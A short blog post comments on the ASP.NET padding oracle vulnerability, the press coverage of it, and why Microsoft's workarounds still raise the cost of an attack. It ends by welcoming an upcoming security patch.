ASP.NET vulnerability gets fixed!

There has been quite some discussion (and speculation!) about the ASP.NET padding oracle vulnerability on various blogs around the Internet the last couple of days. After Microsoft published an advisory on it, the ASP.NET community has been following ScottGu's blog closely.

The issue has seen increasing attention. Yesterday the vulnerability was mentioned on Schneier's blog, where he provided a link to a Threat Post from Kaspersky where the guys behind the exploit were interviewed. The vulnerability and exploit tools were also discussed. The threat post was dated September 13, four days before Microsoft released the first security advisory on the issue. Since then, the amount of information on the vulnerability has only increased throughout the Internet. Now, there's so much information available from different sources that there's not much security through secrecy left.


In today's Kaspersky article on the vulnerability the authors of the exploit state that Microsoft's workarounds are ineffective. These guys seem very confident in the effectiveness of their attack. But as long as the attack relies on observing different behaviour occurring over a series of requests to a webserver, Microsoft's workarounds make sense. It's all about maximising the effort an attacker has to put into a successful attack — through reducing his likelihood of success per time period. In the demo, it took 38 000 web requests before the attack was successful. E.g. Doubling the amount of requests necessary for a successful attack will buy valuable time!

But, good news has arrived as I'm writing this! ScottGu just blogged about a security update shipping tomorrow! Honestly, we've been looking forward to this one! I guess a lot of people will spend the next day or two testing the patch. Happy patching! :)